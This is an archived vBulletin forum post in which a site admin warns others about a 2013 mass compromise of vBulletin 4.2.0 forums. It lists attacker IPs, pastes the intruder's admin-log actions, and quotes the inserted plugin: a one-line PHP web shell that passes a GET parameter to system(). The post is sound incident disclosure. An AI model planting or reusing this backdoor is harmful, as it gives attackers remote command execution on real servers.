The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
|
#1
|
|||
|
|||
v4.2.0 hacker details
This script kiddy can't handle his hormones and has gone on a rampage.
https://www.google.co.uk/#q=%22ma3kesi%22 Most of the forums are running 4.2.0 (some patch 3). Several hundred (including mine) are showing that username indexed in google in the past week. IP address found in my adminlog table, you can search them yourself, from Indonesia/Burma. 203.81.72.83 101.255.62.233 email (I think not real, they didn't need a real email once inside): ma3kesi@mm.com Block these IPs, they are frequently used for all types of attacks (even on Gmail and facebook). What they did. From the adminlog (descending, so first actions at the bottom.: Column headers: `adminlogid`, `userid`, `dateline`, `script`, `action`, `extrainfo`, `ipaddress` Code:
7627, 1920, 1379801626, 'user.php', 'modify', '', '203.81.72.83'), (7626, 1920, 1379801594, 'user.php', 'find', '', '203.81.72.83'), (7625, 1920, 1379801583, 'user.php', 'find', '', '203.81.72.83'), (7624, 1920, 1379801578, 'user.php', 'modify', '', '203.81.72.83'), (7623, 1920, 1379801565, 'user.php', 'add', '', '203.81.72.83'), (7622, 1920, 1379801447, 'plugin.php', '', '', '203.81.72.83'), (7621, 1920, 1379801445, 'plugin.php', 'kill', 'plugin id = 40', '203.81.72.83'), (7620, 1920, 1379801443, 'plugin.php', 'delete', 'plugin id = 40', '203.81.72.83'), (7619, 1920, 1379801438, 'plugin.php', '', '', '203.81.72.83'), (7618, 1920, 1379801436, 'plugin.php', 'kill', 'plugin id = 42', '203.81.72.83'), (7617, 1920, 1379801434, 'plugin.php', 'delete', 'plugin id = 42', '203.81.72.83'), (7616, 1920, 1379801428, 'plugin.php', '', '', '203.81.72.83'), (7615, 1920, 1379801426, 'plugin.php', 'kill', 'plugin id = 41', '203.81.72.83'), (7614, 1920, 1379801424, 'plugin.php', 'delete', 'plugin id = 41', '203.81.72.83'), (7613, 1920, 1379801410, 'plugin.php', 'modify', '', '203.81.72.83'), (7612, 1920, 1379801373, 'options.php', 'options', '', '203.81.72.83'), (7611, 1920, 1379801371, 'options.php', 'dooptions', '', '203.81.72.83'), (7610, 1920, 1379801359, 'options.php', 'options', '', '203.81.72.83'), (7609, 1920, 1379801279, 'options.php', 'options', '', '203.81.72.83'), (7608, 1920, 1379801226, 'options.php', 'options', '', '203.81.72.83'), (7607, 1920, 1379801224, 'options.php', 'dooptions', '', '203.81.72.83'), (7606, 1920, 1379801181, 'options.php', 'options', '', '203.81.72.83'), (7605, 1920, 1379801180, 'options.php', 'dooptions', '', '203.81.72.83'), (7604, 1920, 1379801144, 'options.php', 'options', '', '203.81.72.83'), (7603, 1920, 1379801125, 'options.php', '', '', '203.81.72.83'), (7602, 1920, 1379801038, 'user.php', 'pruneusers', '', '203.81.72.83'), (7601, 1920, 1379801023, 'user.php', 'modify', '', '203.81.72.83'), (7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'), (7599, 1920, 1379801016, 'user.php', 'remove', 'user id = 1919', '203.81.72.83'), (7598, 1920, 1379801011, 'user.php', 'edit', 'user id = 1919', '203.81.72.83'), (7597, 1920, 1379801005, 'user.php', 'pruneusers', '', '203.81.72.83'), (7596, 1920, 1379800998, 'user.php', 'modify', '', '203.81.72.83'), (7595, 1920, 1379800996, 'user.php', 'kill', 'user id = 1', '203.81.72.83'), (7594, 1920, 1379800993, 'user.php', 'remove', 'user id = 1', '203.81.72.83'), (7593, 1920, 1379800978, 'user.php', 'edit', 'user id = 1', '203.81.72.83'), (7592, 1920, 1379800969, 'user.php', 'dopruneusers', '', '203.81.72.83'), (7591, 1920, 1379800891, 'user.php', 'pruneusers', '', '203.81.72.83'), (7590, 1920, 1379800870, 'user.php', 'find', '', '203.81.72.83'), (7589, 1920, 1379800860, 'user.php', 'modify', 'user id = 1', '203.81.72.83'), (7588, 1920, 1379800858, 'user.php', 'update', 'user id = 1', '203.81.72.83'), (7587, 1920, 1379800838, 'user.php', 'edit', 'user id = 1', '203.81.72.83'), (7586, 1920, 1379800807, 'user.php', 'pruneusers', '', '203.81.72.83'), (7585, 1920, 1379800798, 'user.php', 'prune', '', '203.81.72.83'), (7584, 1920, 1379800796, 'user.php', 'pruneusers', '', '203.81.72.83'), (7583, 1920, 1379800786, 'user.php', 'prune', '', '203.81.72.83'), (7582, 1920, 1379800784, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7581, 1920, 1379800783, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7580, 1920, 1379800781, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7579, 1920, 1379800779, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7578, 1920, 1379800777, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7577, 1920, 1379800775, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7576, 1920, 1379800773, 'user.php', 'dopruneusers', '', '203.81.72.83'), (7575, 1920, 1379800628, 'user.php', 'pruneusers', '', '203.81.72.83'), (7574, 1920, 1379800602, 'user.php', 'prune', '', '203.81.72.83'), (7573, 1920, 1379800585, 'banning.php', 'dobanuser', 'username = mikey', '203.81.72.83'), (7572, 1920, 1379800556, 'banning.php', 'banuser', '', '203.81.72.83'), (7571, 1920, 1379800485, 'plugin.php', 'updateactive', '', '203.81.72.83'), (7570, 1920, 1379800467, 'plugin.php', '', '', '203.81.72.83'), (7569, 1920, 1379800465, 'plugin.php', 'kill', 'plugin id = 18', '203.81.72.83'), (7568, 1920, 1379800462, 'plugin.php', 'delete', 'plugin id = 18', '203.81.72.83'), (7567, 1920, 1379800445, 'plugin.php', '', '', '203.81.72.83'), (7566, 1920, 1379800443, 'plugin.php', 'kill', 'plugin id = 17', '203.81.72.83'), (7565, 1920, 1379800441, 'plugin.php', 'delete', 'plugin id = 17', '203.81.72.83'), (7564, 1920, 1379800421, 'plugin.php', '', '', '203.81.72.83'), (7563, 1920, 1379800420, 'plugin.php', 'kill', 'plugin id = 51', '203.81.72.83'), (7562, 1920, 1379800416, 'plugin.php', 'delete', 'plugin id = 51', '203.81.72.83'), (7561, 1920, 1379800412, 'plugin.php', 'modify', '', '203.81.72.83'), (7560, 1920, 1379800376, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'), (7559, 1920, 1379800371, 'navigation.php', 'update', 'navid = 0, tabid = 2', '203.81.72.83'), (7558, 1920, 1379800363, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'), (7557, 1920, 1379800361, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'), (7556, 1920, 1379800359, 'navigation.php', 'default', 'navid = 2, tabid = 0', '203.81.72.83'), (7555, 1920, 1379800351, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'), (7554, 1920, 1379800349, 'navigation.php', 'update', 'navid = 0, tabid = 1', '203.81.72.83'), (7553, 1920, 1379800343, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'), (7552, 1920, 1379800341, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'), (7551, 1920, 1379800338, 'navigation.php', 'default', 'navid = 75, tabid = 0', '203.81.72.83'), (7550, 1920, 1379800283, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'), (7549, 1920, 1379800281, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'), (7548, 1920, 1379800278, 'navigation.php', 'default', 'navid = 1, tabid = 0', '203.81.72.83'), (7547, 1920, 1379800273, 'navigation.php', 'list', 'navid = 0, tabid = 0', '203.81.72.83'), (7546, 1920, 1379800181, 'template.php', 'updatetemplate', 'style id = 3', '203.81.72.83'), (7545, 1920, 1379800170, 'template.php', 'edit', 'style id = 0', '203.81.72.83'), (7544, 1920, 1379800166, 'template.php', 'modify', '', '203.81.72.83'), (7543, 1920, 1379800156, 'template.php', 'modify', '', '203.81.72.83'), (7542, 1920, 1379800151, 'template.php', 'modify', '', '203.81.72.83'), (7541, 1920, 1379800099, 'plugin.php', '', '', '203.81.72.83'), (7540, 1920, 1379800091, 'plugin.php', 'update', '', '203.81.72.83'), (7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'), (7531, 1919, 1379796618, 'plugin.php', 'updateactive', '', '101.255.62.233'), (7530, 1919, 1379796615, 'plugin.php', '', '', '101.255.62.233'), (7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'), (7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233'); They inserted this plugin (it was id=52 for me): Code:
(52, 'lol', 'ajax_complete', 'if(isset($_GET[''lol''])){echo\r\n"<h1>lol</h1><pre>"; system($_GET\r\n[''lol'']);exit;}', 'vbulletin', '', 1, 5); Initially they did change the main forum.php file too, I think this was through the admincp option because there is no sign of FTP access. I'm not a server guy, maybe they got in through SSH. I also have about 550 lines of raw server log data, showing what these 2 IPs did. I'm not sure if I should post it for not though. It seems to start with admincp/zxc.php |
2 благодарности(ей) от: | ||
Max Taxable, smirkley |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|